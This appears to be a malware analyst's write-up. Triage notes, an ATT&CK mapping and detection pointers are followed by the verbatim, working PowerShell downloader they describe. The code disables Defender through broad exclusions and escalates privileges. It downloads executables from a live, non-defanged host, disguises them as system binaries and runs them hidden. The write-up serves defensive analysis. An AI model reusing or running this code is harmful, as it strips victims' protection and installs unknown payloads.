# Analyst notes (PowerShell, not POSIX shell). The code below is kept verbatim,
# in the whitespace-collapsed form in which it was captured.
#
# Shape: a two-stage downloader.
#   Stage 1 (outside the here-string):
#     - Hides its console window via P/Invoke (GetConsoleWindow + ShowWindow with nCmdShow 0).
#     - Writes the here-string body to $env:TEMP\CLR\v3.0.ps1 with Out-File.
#     - If the current identity is not in the Administrators role, starts powershell.exe with
#       "-NoProfile -ExecutionPolicy Bypass -File <that path>" and -Verb RunAs, then exits.
#   Stage 2 (the text between @' and '@; a single-quoted here-string, so stage 1 treats it
#   as data and expands no variables in it):
#     - Repeats the console hiding and the administrator check.
#     - Calls Add-MpPreference to add Defender exclusions for "C:\Program Files (x86)",
#       "C:\Users", $env:TEMP and $env:APPDATA, plus the extension "*.exe"; errors are
#       suppressed with -ErrorAction SilentlyContinue.
#     - Fetches four files from dl.server945811[.]com (defanged here) with curl.exe, falling
#       back to "certutil -urlcache -split -f", with up to five attempts per file.
#     - Saves each file under $env:TEMP\<five-digit random number>\ using a local name that
#       differs from the remote one (svchost.exe, services.exe, "Steam Support.exe",
#       "Windows Logon Application.exe"), adds a per-file Defender exclusion, and starts it
#       with -WindowStyle Hidden (retrying without that switch on failure).
#   What the downloaded executables do cannot be determined from this listing.
#
# ATT&CK mapping for triage: T1059.001 (PowerShell), T1564.003 (Hidden Window),
# T1562.001 (Disable or Modify Tools), T1105 (Ingress Tool Transfer),
# T1036.005 (Match Legitimate Name or Location).
#
# Detection and hardening pointers:
#   - Defender configuration changes, including new exclusions, are recorded as event 5007 in
#     Microsoft-Windows-Windows Defender/Operational; a broad path or "*.exe" exclusion is
#     worth alerting on by itself.
#   - Script block logging (event 4104, Microsoft-Windows-PowerShell/Operational) captures
#     both stages; process-creation telemetry shows powershell.exe with
#     "-ExecutionPolicy Bypass -File" pointing into %TEMP%, and certutil.exe with -urlcache.
#   - svchost.exe or services.exe executing from a path outside %SystemRoot%\System32 is a
#     masquerading indicator.
#   - Centrally managed Defender policy can keep locally added exclusions from taking effect
#     (for example the DisableLocalAdminMerge setting); confirm against your own baseline.
$ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); ' function Hide-Console { $consolePtr = [Console.Window]::GetConsoleWindow() [Console.Window]::ShowWindow($consolePtr, 0) } Hide-Console $scriptPath = "$env:TEMP\CLR\v3.0.ps1" $scriptDir = Split-Path $scriptPath -Parent if (-not (Test-Path $scriptDir)) { New-Item -ItemType Directory -Path $scriptDir -Force | Out-Null } $scriptContent = @' $ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 # Hide console window Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); ' function Hide-Console { $consolePtr = [Console.Window]::GetConsoleWindow() [Console.Window]::ShowWindow($consolePtr, 0) } Hide-Console # Elevate if not admin if (-NOT ([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$scriptPath`"" -Verb RunAs exit } $exclusions = @( "C:\Program Files (x86)" "C:\Users" "$env:TEMP" "$env:APPDATA" ) foreach ($path in $exclusions) { Add-MpPreference -ExclusionPath $path -ErrorAction SilentlyContinue } Add-MpPreference -ExclusionExtension "*.exe" -ErrorAction SilentlyContinue Start-Sleep -Seconds 5 $tempDir = Join-Path $env:TEMP "ExeDownloads" if (-not (Test-Path $tempDir)) { New-Item 
-ItemType Directory -Path $tempDir -Force | Out-Null } $files = @( @{url="https://dl.server945811.com/services.exe"; name="svchost.exe"}, @{url="https://dl.server945811.com/Cypher.exe"; name="services.exe"}, @{url="https://dl.server945811.com/conhost.exe"; name="Steam Support.exe"}, @{url="https://dl.server945811.com/ON.exe"; name="Windows Logon Application.exe"} ) $useCurl = $null -ne (Get-Command curl.exe -ErrorAction SilentlyContinue) foreach ($item in $files) { $url = $item.url $name = $item.name $rnd = Get-Random -Minimum 10000 -Maximum 99999 $folder = "$env:TEMP\$rnd" $filePath = "$folder\$name" New-Item -ItemType Directory -Path $folder -Force | Out-Null $success = $false for ($i = 1; $i -le 5; $i++) { try { if ($useCurl) { curl.exe -L --retry 3 --retry-delay 2 -o "$filePath" "$url" --silent } else { certutil -urlcache -split -f "$url" "$filePath" | Out-Null } if (Test-Path $filePath) { $success = $true; break } } catch {} Start-Sleep -Seconds 3 } if ($success) { Add-MpPreference -ExclusionPath $filePath -ErrorAction SilentlyContinue try { Start-Process -FilePath $filePath -WindowStyle Hidden -ErrorAction Stop } catch { Start-Process -FilePath $filePath -ErrorAction SilentlyContinue } } else { Start-Sleep -Seconds 1 } Start-Sleep -Seconds 3 } Start-Sleep -Seconds 10 '@ $scriptContent | Out-File -FilePath $scriptPath -Encoding UTF8 -Force if (-NOT ([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$scriptPath`"" -Verb RunAs exit }